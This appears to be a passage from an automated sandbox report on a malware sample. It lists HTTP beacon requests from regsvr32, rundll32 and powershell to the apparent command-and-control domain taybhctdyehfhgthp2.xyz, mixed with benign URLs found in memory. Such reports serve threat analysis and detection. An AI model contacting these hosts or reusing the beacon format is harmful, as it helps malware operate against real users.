            Source: global trafficHTTP traffic detected: GET /jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgTZ0UAG/nQc7Y04rHd/Wf9d711z2fDYWnZSZ/I5gtE5194Pn8/54FQXS9Bp0p/Yr0NIxUfu5Fay8/_2FlA1aXKnd2v_2B9oARj/_2Fx_2FChvh5vpN4/OMwk_2BosEsV5ld/sSRuMcQjMYnxoDOxLX/9QI7NxpfE/WeR0iN16/80Qd2J2g/G.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXVD/nyA2CFklxFPwVQh/Yho06_2FbaOGMgTxMt/wv24AfIjN/0MFgIcSL6gEiPqujKV_2/FBuSaCXg7gU09XOKs6c/4flUb9QPzKFwKqbjV_2FMz/mqc6yG0M3rYrC/7N85LJjr/tu_2BqIUaqz1VBst_2F35QW/3.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk4_2BjgWwj5Y0S8K/QFWsxQXH1nBjETKY/5OHlicPcimNIcL6/z4pHXf1uPEPssBLv8K/mnGWtLd2A/uaW_2Bl6KqHoNDaU_2Bh/DiOvILfU9m_2BExEsIT/5_2B5_2BSmOr5E2GYDUf9Y/mDnzrYQJR/mky.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_2BS6o/EetdeEq5gQ_2FyXySX/Ubse8b9so/m_2FVXqZKmYn0vbRxn_2/BpcuM8syJiHvDzsFPwE/VcmFcijyALhTLZxPULLl94/yvHhbYt_2F3zs/MiwgrxH9/_2F06LcLdvAsYVoK_2FJUaB/om5CWM0I.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN1p_2B/FV7Pm6a31d2J5lSN_2/BzGSBLJoW/mkH_2B1SqUGsLgri21vM/sTm8rqFhIKFyjhSMnfS/eOIuSlx61lzuK1AdQtpcLd/ecP_2F2TO_2Bj/KaylSIXS/u6E6oRIpMJVadVClzcxwIS_/2BHj1Xmv/hc.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDUp6Oi5jXD7I8Ab8U/gK4SwCYPiUPEkaUo/PrkNmh92vqxkb0v/PCnqPml9BaZFVRBIe_/2B22S8HAh/d9Tx35KtPfkXAbAsIuzf/2WiITh1H39IL9oWAn14/Ato1qcOoaQdDf8WbLtN5nh/4DNa.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: gtm[1].js.20.drString found in binary or memory: "arg1":"https:\/\/www.facebook.com\/mail.com" equals www.facebook.com (Facebook)
            Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b02aec4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: potec.core.min[2].js.20.drString found in binary or memory: eh=function(){var a=z.O(U('\x3cdiv class\x3d"mod-konami"\x3e\x3cdiv class\x3d"vd"\x3e\x3ciframe width\x3d"640" height\x3d"360" src\x3d"https://www.youtube.com/embed/SrLZgP-OR6s" frameborder\x3d"0" allowfullscreen\x3e\x3c/iframe\x3e\x3cdiv class\x3d"close"\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e').toString());z.O("body").append(a);var b=z.O(".mod-konami");b.width();b.find(".close").b("click",function(){function a(){b.removeNode()}z.T(b,"show");window.Modernizr.csstransitions||a();b.b("transitionend", equals www.youtube.com (Youtube)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: potec.core.min[2].js.20.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.facebook.com (Facebook)
            Source: potec.core.min[2].js.20.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.twitter.com (Twitter)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: powershell.exe, 00000021.00000002.514361003.000001E9C3DA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: head.min[2].js.21.drString found in binary or memory: http://modernizr.com/download/?-csstransforms-csstransforms3d-csstransitions-flexbox-flexboxlegacy-f
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
            Source: powershell.exe, 00000021.00000002.495394325.000001E9AB881000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: picturefill.min[2].js.21.drString found in binary or memory: http://scottjehl.github.io/picturefill
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: imagestore.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico
            Source: imagestore.dat.4.dr, imagestore.dat.24.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico~
            Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmpString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsC
            Source: ~DF41C6F94D5CD15673.TMP.4.dr, {855EF56B-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_
            Source: {7E89C2B0-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF
            Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmpString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_
            Source: {855EF56F-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDU
            Source: {855EF565-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgT
            Source: {855EF567-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXV
            Source: regsvr32.exe, 00000002.00000003.443079927.0000000000FA6000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.449890732.0000000000F96000.00000004.00000001.sdmp, ~DF434D42DEB8F7938B.TMP.4.dr, {7E89C2AA-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0
            Source: ~DFC0327530F4C9EDC8.TMP.4.dr, {855EF56D-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN
            Source: rundll32.exe, 00000003.00000003.475793042.0000000002DD3000.00000004.00000001.sdmp, ~DF58DEFE5429921A67.TMP.4.dr, {855EF569-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk
            Source: {7E89C2AC-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4Wb
            Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
            Source: gtm[1].js.20.drString found in binary or memory: https://adservice.google.com/pagead/regclk
            Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: gtm[1].js.20.dr, optimize[1].js.20.drString found in binary or memory: https://cct.google/taggy/agent.js
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-ch
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: consentpage[1].htm.19.drString found in binary or memory: https://dl.mail.com/permission/live/v1/ppp/js/permission-client.js
            Source: consentpage[1].htm.19.drString found in binary or memory: https://dl.mail.com/tcf/live/v1/js/tcf-api.js
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: url-polyfill[1].js.19.drString found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/src/url-search-params.js
            Source: url-polyfill[1].js.19.drString found in binary or memory: https://github.com/arv/DOM-URL-Polyfill/blob/master/src/url.js
            Source: bundle.min[1].js.19.drString found in binary or memory: https://github.com/getsentry/sentry-javascript
            Source: permission-client[1].js.19.drString found in binary or memory: https://github.com/js-cookie/js-cookie
            Source: picturefill.min[2].js.21.drString found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: core[1].htm.19.drString found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/polyfills.min.js
            Source: core[1].htm.19.drString found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/tracklib.min.js
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1625574581&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1625574582&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1625574581&amp;rver=7.0.6730.0&amp;w
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: 6QglyA[1].htm.19.drString found in binary or memory: https://mail.com/jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWD
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
